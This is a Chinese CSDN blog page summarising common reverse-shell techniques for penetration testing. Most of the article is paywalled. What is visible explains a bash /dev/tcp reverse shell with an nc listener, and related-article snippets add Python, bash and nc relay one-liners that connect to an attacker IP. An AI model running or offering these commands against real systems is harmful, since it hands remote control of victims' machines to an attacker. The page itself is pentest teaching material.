web渗透常见shell反弹姿势

最新推荐文章于 2024-08-08 21:06:47 发布
最新推荐文章于 2024-08-08 21:06:47 发布
阅读量836 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: shell bash 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuoLi_s/article/details/110286504
版权
本文详细总结了web渗透中常见的shell反弹方法,包括bash、nc(netcat)、telnet以及多种脚本语言(如python、perl、ruby、php、java、lua和awk)的反弹技巧。通过实例演示了如何在目标主机上执行命令,以及攻击机如何监听并接收反弹的shell。
摘要由CSDN通过智能技术生成

常见反弹shell总结:

原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14204882.html

一、bash反弹

通用

① 在kali机里面开启端口监听:

nc -lvvp port		//port 为攻击主机端口号,并且此端口号没有被占用

② 在目标主机上执行:

bash -i >& /dev/tcp/攻击主机ip/port 0>&1		//port 为攻击主机端口号

③ 解释

bash -i: 打开一个交互的bash

.>&: 标准错误输出重定向到标准输出

/dev/tcp/x.x.x.x/port : 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口

0>&1: 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

④ 补充

linux she

最低0.47元/天 解锁文章
RuoLi_s
关注
专栏目录
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 727
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
java 反弹连接_渗透-N种反弹shell方法
weixin_30753213的博客
02-27 823
简介reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。什么是反弹,为什么要反弹假设我们攻击了一台机器,打开了该机器的一个端...
webshell反弹工具包
01-25
成套web反弹工具包,包含控制端,被控端。和端口监听工具,配套详细的使用说明
反弹shell
litiammmm的博客
07-29 872
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
常见 反弹shell的方法
最新发布
qq_48368964的博客
08-08 1364
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip
[网鼎杯 2020 朱雀组]phpweb-反弹shell
YkingH的博客
03-10 5446
[网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.php中两个参数,通过对参数的修改,发现用到了call_user_func()函数 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sXIyF4mu-1646878901483)(D:\Blog\做题题解[网鼎杯 2020 朱雀组]phpweb\image-2022030920444
【web安全】反弹shell 靶场测试+实战
weixin_46301214的博客
11-22 528
NAT不一定可以,而且多了一行话,相同用户名的情况下还以为失败了。这里只讲实战或真机演练,具体原理网上一搜一大把,自己去看。知识点2:靶机测试 - 双kali - 脚本反弹。知识点2:靶机测试 - 双kali - 脚本反弹。知识点1:靶机测试 - 双kali。踩坑点:局域网内才稳定。:需要局域网内才稳定。
Web渗透中的反弹Shell端口转发的奇淫技巧
大方子
10-02 9649
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i >& /dev/tcp/x.x.x.x/2333 0&g...
反弹shell的方式
08-11
另外,Cobalt Strike工具的Scripted Web Delivery模块也可以通过bitsadmin、powershell、python、regsvR32等方式来实现反弹shell的功能。在Windows系统下,一种常见反弹shell方式是通过3389端口来远程连接目标主机...
常见端口渗透笔录
里卡多·伊泽克森·多斯·桑托斯·达的博客
03-24 1247
常见端口渗透笔录 这个不是我写的,朋友圈看到的
webshel反弹shell
公众号shadow sock7
10-21 673
只需要使用burp的decoder功能,将命令url编码一下就可以了。 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s....
ctf web中快速反弹
wssmiss的博客
03-25 602
**原文:**https://ciphersaw.me/2017/12/16/详解 CTF Web 中的快速反弹 POST 请求/ 原文作者:Cipher Saw 0x00 前言 在 CTF Web 的基础题中,经常出现一类题型:在 HTTP 响应头获取了一段有效期很短的 key 值后,需要将经过处理后的 key 值快速 POST 给服务器,若 key 值还在有效期内,则服务器返回最终的 flag...
windows反弹主机_反弹shell的N种姿势
weixin_28907247的博客
01-31 915
0x00 前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev...
[陇剑杯 2021]简单日志分析
J_linnb的博客
04-30 406
将最后一串base64编码解码发现ip端口,由于最后一串中含有url编码,可以先进行url解码再进行base64解码。黑客查看的秘密文件的绝对路径是(/Th4s_IS_VERY_Import_Fi1e)。黑客反弹shellip端口是(192.168.2.197:8888)将user后面base64编码解码后发现黑客查看的文件路径。黑客攻击的参数是(user)。(如有字母请全部使用小写)分析日志,可以发现黑客使用user传参所有参数为user。
反弹Shell原理与实现
m0_62451321的博客
11-14 3298
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
反弹shell总结
weixin_44576725的博客
04-26 4645
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
渗透中反弹shell端口
千寻的博客
01-03 1834
渗透中反弹shell端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shellbash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5924
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
Linux内网渗透:反弹shell技术详解
"这份学习笔记整合了多种反弹shell的方法,包括bash反弹、telnet反弹和nc反弹,主要面向网络安全和内网渗透领域的学习者。内容详尽地介绍了各种反弹shell的命令行操作,适用于Linux环境,并提醒注意不同发行版可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值